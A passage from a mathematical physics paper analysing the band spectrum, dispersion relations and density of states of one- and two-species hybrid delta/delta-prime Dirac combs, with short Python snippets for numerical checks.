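print(roots)  # each k_n -> n pi / a as w0 -> infinity (case 5)
```

For $w_0<0$ the same scheme applies with the search intervals moved to the branches where $\tan(ka)>0$.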
We finish the description of these relevant limiting cases here and now turn to the study of the band spectrum structure of the one-species hybrid Dirac comb.
\subsection{Structure of the band spectrum}
{So far, we have focused our attention on the positive band energy spectrum. As is well known, the spectrum of positive energy bands contains an infinite number of allowed bands\footnote{This statement excludes the extreme situations in which one recovers the continuum spectrum of the free particle ($w_1=\pm\infty$ or $w_1=w_0=0$).}, since we are dealing with an infinite linear chain. Furthermore, when the coupling $w_0<0$, the $\delta\text{-}\delta'$ potential admits at most one bound state. This means that there might be situations in which the hybrid Dirac comb has one negative energy band (giving rise to non-propagating states), which can be characterised by purely imaginary momenta $k=i\kappa$ with $\kappa>0$.} In the present subsection we study the conditions for the existence of a negative energy band and the conditions for the existence of a gap between the negative energy band (localised states) and the first positive energy band (propagating states).
\subsubsection{Negative energy bands in the pure $\delta$-comb}
To start with, we study these questions for the pure Dirac delta comb with attractive deltas. From \eqref{3.2}, it is easy to obtain the secular equation for the Dirac comb with attractive delta potentials by choosing $w_1=0$ and $w_0<0$, and purely imaginary momenta:
\begin{equation}\label{3.16}
\cos( qa) = F(i\kappa;w_0,0) \,, \qquad F(i\kappa;w_0,0) =\cosh (\kappa a) - \frac a2\,|w_0|\,\frac{\sinh (\kappa a)}{\kappa a}\,.
\end{equation}
From Eq. \eqref{3.16}, we obtain the following relations:
\begin{equation}\label{3.17}
F(0;w_0,0) =1-\frac a2\,|w_0| \qquad {\rm and} \qquad \left. \frac{\partial F}{\partial\,\kappa}(i\kappa; w_0,0) \right|_{\kappa=0} =0\,.
\end{equation}
From \eqref{3.17}, we observe that $\kappa=0$ is a critical point of $F(i\kappa;w_0,0)$, which is an even function of $\kappa$. In addition:
\begin{itemize}
\item
For the second derivative with respect to the variable $\kappa$, we have that
\begin{equation}\label{3.18}
\left. \frac{\partial^2 F}{\partial\,\kappa^2}(i\kappa; w_0,0) \right|_{\kappa=0} = a^2\left( 1- \frac{a}{6}\,|w_0|\right).
\end{equation}
\item
We have the following limit:
\begin{equation}\label{3.18p}
\lim_{\kappa \to \pm\infty} F(i\kappa;w_0,0)= +\infty\,.
\end{equation}
\item
Within the interval $0<|w_0|a<6$ and for $\kappa>0$, the first derivative of $F(i\kappa;w_0,0)$ is positive. This means that {$F(i\kappa;w_0,0)$} is strictly increasing on $(0,\infty)$. Thus, for $0<|w_0|a<6$ no relative extrema (maxima or minima) may exist, except for the minimum at the origin.
\end{itemize}
All these facts have important consequences that we list in the sequel:
\begin{itemize}
\item[$*$]
Values of $a$ and $w_0$ for which $0<|w_0|a<4$. There is a minimum of $F(i\kappa;w_0,0)$ at the origin with absolute value smaller than one. In consequence, the function $F(i\kappa;w_0,0)$ does not intersect the line $F=-1$ and intersects the line $F=1$ at some point $\kappa_1$. Then, in principle, the valence band should lie in the energy interval $[-\kappa^2_1,0] $, as these are the energy values for which the modulus of $F(i\kappa;w_0,0)$ is smaller than one. In addition, we must take into account the existence of the conduction band, which is characterised by the values of $k^2$ for which $|F(k;w_0,0)|\le 1$. This gives an interval of energies $[0,k^2_2]$ for the conduction band. Therefore, we have a merged valence-conduction band in the energy interval $[-\kappa_1^2,k^2_2]$.
\item[$*$]
Values for which $4<|w_0|a<6$. From \eqref{3.18}, we see that $\kappa=0$ is still a minimum, although in this case the minimum, $F(i0;w_0,0)$, is smaller than $-1$. In consequence, $\kappa^2=0$ is not an allowed value for the energy. The straight lines $F=\pm 1$ cut $F(i\kappa;w_0,0)$ at the points $\kappa_1$ ($F=1$) and $\kappa_2$ ($F=-1$). Since $F(i\kappa;w_0,0)$ is strictly increasing on the semi-axis $\kappa\in(0,\infty)$, it follows that $\kappa_2<\kappa_1$. Here, we have a valence band in the interval
$[-\kappa_1^2,-\kappa_2^2]$.
\item[$*$]
Finally, we may have $6<|w_0|a$. Now, $F(i\kappa;w_0,0)$ shows a {\it maximum} at $\kappa=0$ and a minimum at some point $\kappa_0$. The maximum, $F(i0;w_0,0)$, is smaller than $-1$ and so is the value of $F(i\kappa;w_0,0)$ at the minimum. The situation is exactly as in the previous case.
\end{itemize}
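The three regimes above are easy to verify numerically by scanning \eqref{3.16} in $\kappa$. The sketch below (with illustrative couplings and $a=1$) recovers that for $|w_0|a<4$ the negative band reaches $\varepsilon=0$ and merges with the first positive band, while for $|w_0|a>4$ it detaches:

```python
import numpy as np

def Fneg(kappa, w0, a=1.0):
    """F(i kappa; w0, 0) of eq. (3.16) for the attractive delta comb."""
    x = kappa * a
    return np.cosh(x) - 0.5*np.abs(w0)*a*np.sinh(x)/x

kap = np.linspace(1e-6, 10.0, 100001)
for w0 in (-2.0, -5.0, -8.0):   # |w0| a < 4, in (4, 6), > 6 (illustrative)
    band = kap[np.abs(Fneg(kap, w0)) <= 1.0]
    print(w0, 'negative band: energies in [%.4f, %.4f]'
          % (-band.max()**2, -band.min()**2))
```

The scan also makes the distinction between the second and third regimes visible only through the shape of $F(i\kappa)$, not through the band itself, in agreement with the discussion above.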
\subsubsection{The band spectrum for the hybrid $\delta$-$\delta'$ comb}
We want to underline that the main objective of the present work is the analysis of the band structure differences between the usual Dirac comb and the hybrid Dirac comb introduced here. The strategy to accomplish this goal goes as follows: first, we fix a value of $w_0$ and then study how the solutions of the secular equation \eqref{3.2} vary with $w_1$. We do not expect to obtain an analytic closed form for this dependence. Instead, we rely on numerical and graphical methods with the aid of the package Mathematica.
Let us go back to \eqref{3.2} and take $k=\sqrt\varepsilon$. We already know that the energy for the allowed bands satisfy the inequality
\begin{equation}\label{3.19}
\left\vert F(\sqrt{\varepsilon}; w_0,w_1)\right\vert=\left\vert f(w_1) \left[ \cos(a\sqrt{\varepsilon})+\frac{a}{2}w_0\ h(w_1)\,
\frac{\sin(a\sqrt{\varepsilon})}{a\sqrt{\varepsilon}} \right] \right\vert\leq 1\,.
\end{equation}
The choice of $\varepsilon$ as the variable in \eqref{3.19}, instead of $k$, ensures that the single expression \eqref{3.19} is valid for both {positive and negative energy bands}, depending on the sign of the energy $\varepsilon$.
\begin{figure}[htbp]
\begin{center}
\includegraphics[height=0.22\textheight]{1sp-weak_att1.jpg}\qquad \qquad \includegraphics[height=0.22\textheight]{1sp-weak_att2.jpg}
\caption{(color online) On the left, allowed (yellow) and forbidden (blue) energy bands from \eqref{3.19} for $w_0=-0.5$ and $a=1$. On the right a zoom of the lowest energy band. The horizontal red line represents level $\varepsilon=0$.}
\label{Figure1}
\end{center}
\end{figure}
In Figures~\ref{Figure1}-\ref{Figure2}, we represent allowed ($\left\vert F(\sqrt{\varepsilon}; w_0,w_1)\right\vert\leq1$) and forbidden ($\left\vert F(\sqrt{\varepsilon}; w_0,w_1)\right\vert>1$) bands in terms of $w_1$ for given fixed values of $w_0$. The conclusions that we have reached from our results are the following:
\begin{figure}[htbp]
\begin{center}
\includegraphics[height=0.22\textheight]{1sp-strong_att1.jpg}\qquad \qquad\includegraphics[height=0.22\textheight]{1sp-weak_rep1.jpg}
\caption{(color online) Allowed (yellow) and forbidden (blue) energy bands from \eqref{3.19} with $a=1$. Left: $w_0=-12$. Right: $w_0=0.5$. The horizontal red line represents the level $\varepsilon=0$.}
\label{Figure2}
\end{center}
\end{figure}
\begin{enumerate}
\item
The opaque couplings $w_1=\pm1$ make the allowed energy bands collapse to isolated points, {so that we have a discrete energy spectrum coming from the well known secular equation \eqref{3.9}. This is in agreement with the numerical results shown in Figures~\ref{Figure1}-\ref{Figure2}: when $w_1=1$ the width of each allowed energy band becomes zero}.
\item
For any given real value of $w_0$, the forbidden energy bands disappear in the asymptotic limit $|w_1|\to \infty$, so that this limit gives the free particle. The explanation of this apparently surprising outcome is the following: from \eqref{3.1}, $t(k,w_0,\pm \infty)=-1$, thus the scattering due to the {$\delta-\delta'$ interaction} is almost transparent, up to a phase shift of $\pi$ after crossing the $\delta'$ potential. Hence, when $|w_1|$ becomes large, the ``crystal'' effect disappears and the system behaves as the free particle on the real line. We reach the conclusion that the $\delta'$ coupling at $w_1=\pm\infty$ is not strong but, on the contrary, quite weak!
\end{enumerate}
From the analysis of these plots, we observe that there are regions in the $(w_0,w_1)$-plane where there exists a negative energy band (the yellow regions below the horizontal red line in Figures \ref{Figure1} and \ref{Figure2}), and regions where there is no negative energy band, such as in the right plot of Figure \ref{Figure2}, where the red line never intersects a yellow area. The situations in which the lowest energy band is positive correspond to a system where the charge carriers in the crystal move freely along it {as a plane wave}. Concerning the situation in which there is a negative energy band, we can distinguish two very different behaviours\footnote{{The behaviour of this system as a conductor or insulator depends on the number of charge carriers in the crystal, which, together with the band spectrum, fixes the position of the Fermi level.}}:
\begin{itemize}
\item
{When there is no gap between the negative energy band and the first positive energy band (regions where the red horizontal line is contained in the yellow area in Figures \ref{Figure1} and \ref{Figure2}) the carriers in the crystal can go from localised quantum states ($\varepsilon <0$) to propagating states ($\varepsilon>0$). This is a typical conductor behaviour when the charge carriers are fermions and the lowest energy band is not completely filled.
\item
On the other hand when there is a gap between the negative energy band and the first positive energy band (regions where the red horizontal line is contained in the blue area in Figure \ref{Figure2}) all the carriers in the crystal are occupying localised quantum states ($\varepsilon<0$). The existence of such a gap demands an external energy input to promote carriers from the negative energy band to the positive one. Hence whenever the negative energy band is completely filled by carriers of spin $1/2$ this is a typical semiconductor or insulator behaviour depending on the size of the gap. }
\end{itemize}
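Whether the negative band connects to the first positive band can be read off from the value of $F$ at $\varepsilon=0$: taking $k\to 0$ in \eqref{3.19} gives $F\to f(w_1)\left(1+\frac{a}{2}w_0\,h(w_1)\right)$, so $\varepsilon=0$ is allowed precisely when this number has modulus at most one. A minimal sketch (the parameter values reproduce the situations of Figures \ref{Figure1} and \ref{Figure2}):

```python
import numpy as np

def F0(w0, w1, a=1.0):
    """k -> 0 limit of F(sqrt(eps); w0, w1): f(w1) * (1 + a*w0*h(w1)/2)."""
    f = (1 + w1**2) / (1 - w1**2)
    h = 1.0 / (1 + w1**2)
    return f * (1 + 0.5*a*w0*h)

def zero_is_forbidden(w0, w1):
    """True when eps = 0 lies in a gap; if a negative band exists, this signals
    a gap between it and the first positive band."""
    return abs(F0(w0, w1)) > 1.0

print(zero_is_forbidden(-0.5, 0.0), zero_is_forbidden(-12.0, 0.0))  # -> False True
```

For $w_0=-0.5$ the bands merge across $\varepsilon=0$ (conductor-like behaviour), while for $w_0=-12$ the negative band is detached (semiconductor or insulator behaviour, depending on the gap size).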
\subsection{Dispersion relation and density of states in allowed bands}
In our treatment of a particle moving through a periodic potential, it is noteworthy the emergence of some interesting features.
\subsubsection{Effect of the $\delta'$ on the energy bands}
Let us first consider the dispersion relation for each band $\varepsilon_n(q)$, given in \eqref{3.2} {with $k=\sqrt{\varepsilon}$. Figures} \ref{Figure44}-\ref{Figure66} show the behaviour of the energy band
$\varepsilon_n(q;w_0,w_1)$ given by the solutions of the
transcendental equation \eqref{3.2}. In each plot, the band $\varepsilon_n(q;w_0,w_1)$ is compared with the corresponding energy band of the $\delta$ comb, which is $\varepsilon_n(q;w_0,0)$.
From Figures \ref{Figure44}-\ref{Figure66} we can infer the following general properties:
\begin{figure}[htbp]
\begin{center}
\includegraphics[height=0.22\textheight]{energy_m2.jpeg}
\quad \quad
\includegraphics[height=0.22\textheight]{energy_m5.jpeg}
\caption{(color online) First two allowed energy bands for the Dirac comb (solid green curve) and the one-species hybrid comb (dashed lines), given by \eqref{3.2}.
On the left $w_0=-2$ for all the cases and on the right $w_0=-5$. In both cases the black line represents the zero energy level.}
\label{Figure44}
\end{center}
\end{figure}
\begin{enumerate}
\item
When the Dirac-$\delta$ comb has a completely negative energy band ($w_0\ll 0$), i.e., there is a forbidden energy gap between the localised states and the lowest-energy propagating states (see Figure \ref{Figure44}, right, and Figure \ref{Figure2}, right), the appearance of a $\delta'$ term dramatically shifts the negative energy band towards higher energies.
Moreover, when the $\delta'$ coupling $w_1$ becomes large enough, the negative energy band disappears, becoming a positive energy band. In addition, when the Dirac-$\delta$ comb is such that there is no gap between the highest negative energy state and the lowest positive one (see Figure \ref{Figure44}, left), the appearance of a $\delta'$ term does not shift the energy band towards higher energies.
\item
When the Dirac deltas are repulsive (that is, $w_0>0$; see Figure \ref{Figure66}), the appearance of a
$\delta'$ term shifts the maximum and minimum energy of each band. For the bands $\varepsilon_n(q)$ with $n=0,2,4,\ldots$, $\varepsilon_n(qa=\pm\pi)$ decreases and $\varepsilon_n(0)$ increases as $w_1$ grows; the effect is exactly the opposite for $n=1,3,5,\ldots$.
Nevertheless, the lowest energy band always remains within the positive energy region.
\item
In all cases, as can be seen in Figures \ref{Figure44} and \ref{Figure66}, the introduction of the $\delta'$ term modifies the curvature of the allowed energy bands. On the one hand, whenever $|w_1|<1$ (subcritical values) the sign of the curvature of the allowed energy bands is the same as in the Dirac $\delta$ comb case. On the other hand, when $|w_1|>1$ (supercritical values) the sign of the curvature of the allowed energy bands changes with respect to the Dirac $\delta$ comb case.
\begin{figure}[htbp]
\begin{center}
\includegraphics[height=0.22\textheight]{energy_5.jpg}
\caption{(color online) First two allowed energy bands for the Dirac comb (solid green curve) and the one-species hybrid comb (dashed lines), given by \eqref{3.2}, with $w_0=5$ in all the cases.
All the bands have positive energy $\varepsilon$ because $w_0>0$.}
\label{Figure66}
\end{center}
\end{figure}
\item
From Figures \ref{Figure44} and \ref{Figure66} it is straightforward to see that, for fixed $w_0$, the $n$-th allowed energy bands $\varepsilon_n(q;w_0,w_1)$ obtained for different values of $w_1$ share two fixed points, which can be easily obtained from \eqref{3.2} and are given by
\begin{equation}
\frac{\tan (a\sqrt{\varepsilon})}{\sqrt{\varepsilon}}= -\frac4{w_0},
\end{equation}
which correspond to the points of the discrete spectrum obtained in \eqref{3.9} for the critical values $w_1=\pm 1$.
\end{enumerate}
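The $w_1$-independence of these fixed points can be checked numerically. The sketch below is an illustration that assumes the one-species secular function $F(\varepsilon)=\left[(1+w_1^2)\cos(a\sqrt{\varepsilon})+\tfrac{w_0}{2\sqrt{\varepsilon}}\sin(a\sqrt{\varepsilon})\right]/(1-w_1^2)$; at any root $\varepsilon^*$ of the fixed-point condition above, $F$ reduces to $-\cos(a\sqrt{\varepsilon^*})$ independently of $w_1$.

```python
import numpy as np

a, w0 = 1.0, 5.0

def F(eps, w1):
    """Assumed one-species secular function, cos(q a) = F(eps)."""
    k = np.sqrt(eps)
    return ((1 + w1 ** 2) * np.cos(k * a)
            + 0.5 * w0 * np.sin(k * a) / k) / (1 - w1 ** 2)

# Bisect the fixed-point condition tan(a k)/k = -4/w0 on the branch (pi/2, pi).
g = lambda k: np.tan(a * k) / k + 4.0 / w0
lo, hi = 0.5 * np.pi + 1e-9, np.pi - 1e-9
for _ in range(200):
    mid = 0.5 * (lo + hi)
    lo, hi = (lo, mid) if g(lo) * g(mid) <= 0 else (mid, hi)
k_star = 0.5 * (lo + hi)

# F at the fixed point takes the same value for every delta' coupling w1.
values = [F(k_star ** 2, w1) for w1 in (0.0, 0.3, 0.9, 2.0, 5.0)]
```

The list `values` collapses to a single number, equal to $-\cos(ak^*)$, for subcritical and supercritical couplings alike.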
\subsubsection{Effect of the $\delta'$ on the density of states}
The effect of the presence of a $\delta'$ on the density of states will be analysed next. Taking into account the results of Section~\ref{dos21}, and in particular \eqref{2.29}, we show in
Figures~\ref{8} and~\ref{9} the properties of the density of states as a function of the energy $\varepsilon$ for the $\delta$-$\delta'$ comb in different situations. In addition, we compare the numerical results with the density of states of a Dirac $\delta$ comb with the same coupling.
\begin{figure}[h]
\begin{center}
\includegraphics[width=0.4\linewidth]{density_m5_p5.jpeg}\qquad \includegraphics[width=0.4\linewidth]{density_m5_5.jpeg}
\caption{(color online) Density of states in the lower bands of the $\delta$-$\delta^\prime$ comb. On the left, $w_0=-5$ and $w_1=0.5$ (blue curves), compared with the density of states of the Dirac comb (green curves). On the right, the analogous plots for $w_1=5$.}
\label{8}
\end{center}
\end{figure}
\begin{figure}[H]
\begin{center}
\includegraphics[width=0.4\linewidth]{density_5_p5.jpeg}\qquad\includegraphics[width=0.4\linewidth]{density_5_5.jpeg}
\caption{(color online) Density of states in the lower bands of the $\delta$-$\delta^\prime$ comb. On the left, $w_0=5$ and $w_1=0.5$ (blue curves), compared with the density of states of the Dirac comb (green curves). On the right, the analogous plots for $w_1=5$.}
\label{9}
\end{center}
\end{figure}
In Figure~\ref{8} we show the typical behaviour of the density of states for strongly attractive delta wells with subcritical and supercritical $\delta'$ couplings.
On the other hand, in Figure~\ref{9} we plot the density of states for strongly repulsive delta barriers with subcritical and supercritical $\delta'$ couplings.
From the Figures, we infer the following general effects when we introduce a $\delta^\prime$ interaction in a Dirac comb:
\begin{itemize}
\item
Whenever $w_1$ is subcritical ($|w_1|<1$), the band widths are narrower compared to the Dirac comb, and in addition the minima of the density of states are greater than for the Dirac comb (see the left plots in Figures~\ref{8} and~\ref{9}).
\item
If $w_1$ is subcritical ($|w_1|<1$), the forbidden gap of the $\delta$-$\delta^\prime$ comb increases with respect to the Dirac comb (see the left plots in Figures~\ref{8} and~\ref{9}, as well as the left plots of Figures \ref{Figure1}-\ref{Figure2}).
If $w_1$ is supercritical ($|w_1|>1$), the forbidden gap of the $\delta$-$\delta^\prime$ comb decreases with respect to the maximum gap reached at the critical value $w_1=\pm1$ and tends to zero as $w_1\to\infty$ (see the right plots in Figures~\ref{8} and~\ref{9}, as well as the left plots of Figures \ref{Figure1}-\ref{Figure2}).
\item
For those cases in which the Dirac comb has a negative energy band ($w_0<0$), introducing the $\delta^\prime$ interaction shifts the lowest energy band towards higher energies (see Figure~\ref{8}). In addition, when $|w_1|>1$ the positive energy bands are shifted towards higher energies as well.
\item
When the lowest energy band of the Dirac comb is positive ($w_0>0$), introducing the $\delta^\prime$ interaction shifts the lowest energy band towards lower energies (see Figure~\ref{9}). When $|w_1|>1$ this displacement occurs for all the energy bands.
\end{itemize}
The qualitative effects just mentioned and shown in Figures~\ref{8} and~\ref{9} are maintained throughout the space of couplings $(w_0,w_1)$, a fact that can be inferred from Figures~\ref{Figure1}-\ref{Figure2} and from other analytical studies of the densities of states and the forbidden energy bands \cite{KURASOVLARSON}.
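The band narrowing and the growth of the density-of-states minima in the subcritical regime can be illustrated with a short numerical sketch. The code below assumes, as ingredients of the illustration, the one-species secular function $F(\varepsilon)=\left[(1+w_1^2)\cos(a\sqrt{\varepsilon})+\tfrac{w_0}{2\sqrt{\varepsilon}}\sin(a\sqrt{\varepsilon})\right]/(1-w_1^2)$ and the standard one-dimensional relation $g(\varepsilon)=\frac{1}{\pi}\left|\frac{dq}{d\varepsilon}\right|$ with $q(\varepsilon)=\frac{1}{a}\arccos F(\varepsilon)$, which plays the role of \eqref{2.29}.

```python
import numpy as np

def F(eps, w0, w1, a=1.0):
    """Assumed one-species secular function, cos(q a) = F(eps)."""
    k = np.sqrt(eps)
    return ((1 + w1 ** 2) * np.cos(k * a)
            + 0.5 * w0 * np.sin(k * a) / k) / (1 - w1 ** 2)

def first_band(w0, w1, a=1.0, eps_max=60.0, n=60001):
    """Edges (eps_lo, eps_hi) of the lowest allowed band at positive energy.
    Assumes a forbidden gap exists below eps_max after the first band."""
    eps = np.linspace(1e-6, eps_max, n)
    allowed = np.abs(F(eps, w0, w1, a)) <= 1.0
    i0 = np.argmax(allowed)                 # first allowed grid point
    i1 = i0 + np.argmin(allowed[i0:])       # first forbidden point after the band
    return eps[i0], eps[i1 - 1]

def dos(eps, w0, w1, a=1.0, h=1e-5):
    """g(eps) = |dq/deps|/pi with q = arccos(F)/a, by a central difference."""
    q = lambda e: np.arccos(np.clip(F(e, w0, w1, a), -1.0, 1.0)) / a
    return abs(q(eps + h) - q(eps - h)) / (2.0 * h * np.pi)

def min_dos_in_band(w0, w1):
    """Minimum of g(eps) over the interior of the lowest positive band."""
    lo, hi = first_band(w0, w1)
    inner = np.linspace(lo + 0.1 * (hi - lo), hi - 0.1 * (hi - lo), 201)
    return min(dos(e, w0, w1) for e in inner)
```

For the repulsive comb $w_0=5$, comparing $w_1=0$ (Dirac comb) with the subcritical value $w_1=0.5$ shows a narrower first band and a larger minimum of the density of states, in line with the items above.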
\section{The two-species hybrid Dirac comb}\label{sec_2species}
The two-species hybrid Dirac comb is obtained by superposition of two one-species hybrid Dirac combs, like the potential in \eqref{1.8}, with different couplings and displaced by $\pm d/2$ with respect to the original one.
Therefore, in the two-species hybrid Dirac comb the potential $V_C(x)$ in \eqref{2.4} from which the periodic potential is built is given by
\begin{equation}\label{4.1}
V_C(x)=w_0\,\delta(x+\tfrac{d}2)+2w_1\,\delta^\prime (x+\tfrac{d}2)+v_0\,\delta(x-\tfrac{d}2)+2v_1\,\delta^\prime (x-\tfrac{d}2),
\end{equation}
which has been studied in detail in \cite{MM}. As it was already explained in Section~\ref{sec_review}, all we need to know to study the band spectrum and the density of states of the periodic potential built from \eqref{4.1} is its corresponding scattering data, which were computed in \cite{MM}:
\begin{eqnarray}
\label{4.3}
\!\! \!\! \!\! \!\!
t(k)\!\!&\!=\!&\!\! \frac{1}{\Delta}\left(4 k^2 \left(v_1^2-1\right) \left(w_1^2-1\right)\right),
\\ [1ex]
\label{4.4}
\!\! \!\! \!\! \!\!
r_R(k) \!\!&\!=\!&\!\! \frac{-1}{\Delta}\left( e^{-i d k} \left(2 k \left(v_1^2+1\right)+i v_0\right) \left(4 k w_1+i w_0\right)+e^{i d k} \left(2 k
\left(w_1^2+1\right)-i w_0\right) \left(4 k v_1+i v_0\right) \right),
\\ [1ex]
\label{4.5}
\!\! \!\! \!\! \!\!
r_L(k) \!\!&\!=\!&\!\! \frac{1}{\Delta}\left( e^{i d k} \left(2 k \left(v_1^2+1\right)-i v_0\right) \left(4 k w_1-i w_0\right)+e^{-i d k} \left(2 k
\left(w_1^2+1\right)+i w_0\right) \left(4 k v_1-i v_0\right) \right),
\\ [1ex]
\!\! \!\! \!\! \!\!
\Delta(k) \!\!&\!=\!&\!\! e^{2 i d k} \left(4 k v_1+i v_0\right) \left(4 k w_1-i w_0\right)+\left(2 k \left(v_1^2+1\right)+i v_0\right) \left(2 k \left({w_1}^2+1\right)+i w_0\right).
\end{eqnarray}
Our goal is to obtain the secular equation for this case. To this end, we proceed as in Section~\ref{sec_review} for the single-species hybrid potential, using the scattering data. Inserting these scattering amplitudes into \eqref{2.11} and using the definitions introduced in \eqref{3.3}, after some algebraic manipulations we obtain the following expression for the secular equation:
\begin{eqnarray}\label{4.8}
\cos(q a)= f(w_1)f(v_1)\left[\frac{w_0 h(w_1)+v_0 h(v_1)}{2k} \sin (a k)+ \frac{v_0 w_1-v_1 w_0}{k} h(v_1) h(w_1) \sin (k (a-2 d))\right. \nonumber\\[2ex]
+\left. \left(1-\frac{v_0w_0}{4k^2} h(v_1) h(w_1)\right)\cos (a k)+ h(v_1) h(w_1)\left(4w_1v_1+\frac{w_0v_0}{4k^2}\right) \cos (k (a-2 d))\right].
\end{eqnarray}
Observe that there is only one term in \eqref{4.8} that breaks the exchange symmetry $(v_0,v_1)\leftrightarrow(w_0,w_1)$, namely the coefficient of $\sin (k (a-2 d))$. Therefore, all those configurations of the two-species comb for which $v_0 w_1=v_1 w_0$ holds are symmetric under this exchange. In general, the band spectrum is symmetric under the following transformation
\begin{equation}\label{4.10}
(w_0,w_1,v_0,v_1,d)\leftrightarrow(v_0,v_1,w_0,w_1,a-d),\quad {0< d< a}\,.
\end{equation}
This symmetry transformation is easily understood by recalling formula \eqref{4.8}: the difference between placing the $\delta\text{-}\delta'$ pairs at distance $d$ or at distance $a-d$ amounts to exchanging the roles of the coefficients $\{w_0,w_1\}$ and $\{v_0,v_1\}$. This symmetry is manifest in the secular equation \eqref{4.8}.
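The invariance \eqref{4.10} can also be verified numerically. The sketch below implements $\Delta(k)$ and the transmission amplitude exactly as printed in \eqref{4.3}, and assumes, as an ingredient of the illustration, that the right-hand side of the secular equation can equivalently be computed as $\mathrm{Re}\,[e^{-ika}/t(k)]$ (this Bloch-type relation plays the role of \eqref{2.11}).

```python
import cmath

def t_two(k, w0, w1, v0, v1, d):
    """Transmission amplitude of the double delta-delta' unit, Eq. (4.3)."""
    e = cmath.exp(2j * d * k)
    delta = (e * (4 * k * v1 + 1j * v0) * (4 * k * w1 - 1j * w0)
             + (2 * k * (v1 ** 2 + 1) + 1j * v0)
             * (2 * k * (w1 ** 2 + 1) + 1j * w0))
    return 4 * k ** 2 * (v1 ** 2 - 1) * (w1 ** 2 - 1) / delta

def secular_rhs(k, w0, w1, v0, v1, d, a=1.0):
    """cos(q a) as a function of k (assumed Bloch relation Re[exp(-ika)/t(k)])."""
    return (cmath.exp(-1j * k * a) / t_two(k, w0, w1, v0, v1, d)).real
```

With these few lines one can check, for generic $k$, that `secular_rhs(k, w0, w1, v0, v1, d)` coincides with `secular_rhs(k, v0, v1, w0, w1, a - d)`, and that switching off one species ($v_0=v_1=0$) reproduces the one-species secular function.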
\subsection{The band spectrum for the two-species hybrid comb}\label{subsect41}
In this subsection we carry out a qualitative study of the properties of the band spectrum for the two-species hybrid comb. In this situation, the space of parameters has dimension five: $\{w_0,w_1,v_0,v_1,d\}$. Looking at equation \eqref{4.8}, the first thing we can infer is that there are eight different possibilities of having a discrete spectrum, corresponding to the regimes of the couplings in which the transmission amplitude \eqref{4.3} becomes zero: the limits $w_1\to\pm1$, $v_1\to\pm1$, $w_1=v_1\to\pm1$, and $w_1=-v_1\to\pm1$.
\begin{figure}[htbp]
\centerline{ \includegraphics[height=0.22\textheight]{w1v1-plane.jpg}}
\caption{(color online) Regions in the $w_1$-$v_1$ plane that maintain the sign of the band curvature. The green areas are the ones in which each band of the hybrid comb has the same sign as the analogue band of the two-species $\delta$ comb. The orange areas are the ones in which each band of the hybrid comb has the opposite sign as the analogue band of the two-species $\delta$ comb.
}
\label{f9}
\end{figure}
As happens for the one-species hybrid comb, whenever any of the $\delta'$-couplings reaches one of these critical regions of the whole coupling space, the bands of the comb become totally flat (zero curvature), giving rise to a pure point spectrum. Hence the critical regions mentioned above are the regions where the sign of the curvature of the bands changes with respect to the curvature of the bands of the pure two-species $\delta$ comb with couplings $w_0$ and $v_0$. In Figure \ref{f9} we show the change of the band curvature for a hybrid comb with couplings $\{w_0,v_0,w_1,v_1\}$ with respect to the two-species $\delta$-comb with couplings $\{w_0,v_0\}$ in the $w_1$-$v_1$ plane.
The set of critical regimes described above can be divided into two sets:
\begin{enumerate}
\item{The four critical hyperplanes $w_1=\pm1$ and $v_1=\pm1$ affect only one of the species. Thus, the real line is divided into independent boxes with opaque walls and length $a$. Each box confines a quantum particle on the interval $[na\pm d/2,(n+1)a\pm d/2]$, which consequently has a discrete set of energy values. These energy values are those obtained for an infinite one-dimensional square well with an additional interaction of the type $\delta\text{-}\delta'$ located at $x=\pm d/2$. The wave function satisfies Dirichlet boundary conditions at one side and Robin at the other. This fact was shown in \cite{MM}.}
\item{The other four critical regimes correspond to the values $w_1=v_1=\pm 1$ and $w_1=-v_1=\pm 1$. In this case, all $\delta\text{-}\delta'$ interactions are opaque. Therefore, the number of isolated boxes is ``doubled'': each of the isolated intervals $[na\pm d/2,(n+1)a\pm d/2]$, which determine a box, is now split into two disjoint intervals:
$$
[na\pm d/2,(n+1)a\pm d/2] \to [na-d/2,na+d/2)\cup(na+d/2,(n+1)a-d/2].
$$
At each wall, wave functions satisfy either Dirichlet, Neumann or Robin conditions as shown in \cite{MM}. }
\end{enumerate}
The energy band spectrum is determined by equation \eqref{4.8}. In Figures \ref{f10}-\ref{f12} we show the first two energy bands for different two-species hybrid combs, compared to their analogues for the two-species $\delta$-comb. From the figures we can infer the following general properties:
\begin{figure}[h]
\centerline{ \includegraphics[height=0.22\textheight]{2sp_w10_m5m6.jpeg}
\qquad\qquad
\includegraphics[height=0.22\textheight]{2sp_w102_m5m6.jpeg}}
\caption{(color online) First two allowed energy bands for the two-species Dirac comb (solid green curve) and the two-species hybrid comb (dashed lines), given by \eqref{4.8}. For all the cases in both plots $w_0=-5$, $v_0=-6$, $d=1/3$, and $a=1$. Left: $w_1=0$. Right: $w_1=0.2$.
}
\label{f10}
\end{figure}
\begin{figure}[h]
\centerline{ \includegraphics[height=0.22\textheight]{2sp_w102_m5p5.jpeg}
\qquad\qquad
\includegraphics[height=0.22\textheight]{2sp_w14_m5p5.jpeg}}
\caption{(color online) First two allowed energy bands for the two-species Dirac comb (solid green curve) and the two-species hybrid comb (dashed lines), given by \eqref{4.8}. For all the cases in both plots $w_0=-5$, $v_0=5$, $d=1/3$, and $a=1$. Left: $w_1=0.2$. Right: $w_1=4$.
}
\label{f11}
\end{figure}
\begin{figure}[h]
\centerline{ \includegraphics[height=0.22\textheight]{2sp_w102_m15m10.jpeg}
\qquad\qquad
\includegraphics[height=0.22\textheight]{2sp_w14_m15m10.jpeg}}
\caption{(color online) First two allowed energy bands for the two-species Dirac comb (solid green curve) and the two-species hybrid comb (dashed lines), given by \eqref{4.8}. For all the cases in both plots $w_0=-15$, $v_0=-10$, $d=1/3$, and $a=1$. Left: $w_1=0.2$. Right: $w_1=4$.}
\label{f12}
\end{figure}
\begin{itemize}
\item
As can be seen from all the plots in Figures \ref{f10}-\ref{f12}, a consequence of the existence of eight different possible discrete spectra is that there are no fixed crossing points shared by all the energy bands, unlike what happened in the one-species case for the positive energy bands.
\item
When both species of the hybrid comb include very attractive Dirac-$\delta$ wells (Figure \ref{f10}) and there is only one negative energy band, it mostly remains in the negative energy part of the spectrum. Only in those cases in which at least one of the $\delta'$-couplings is supercritical, $|w_1|\gg 1$ and/or $|v_1|\gg 1$, does the lowest energy band cross into the positive energy spectrum (see Figure \ref{f10}, right).
\item
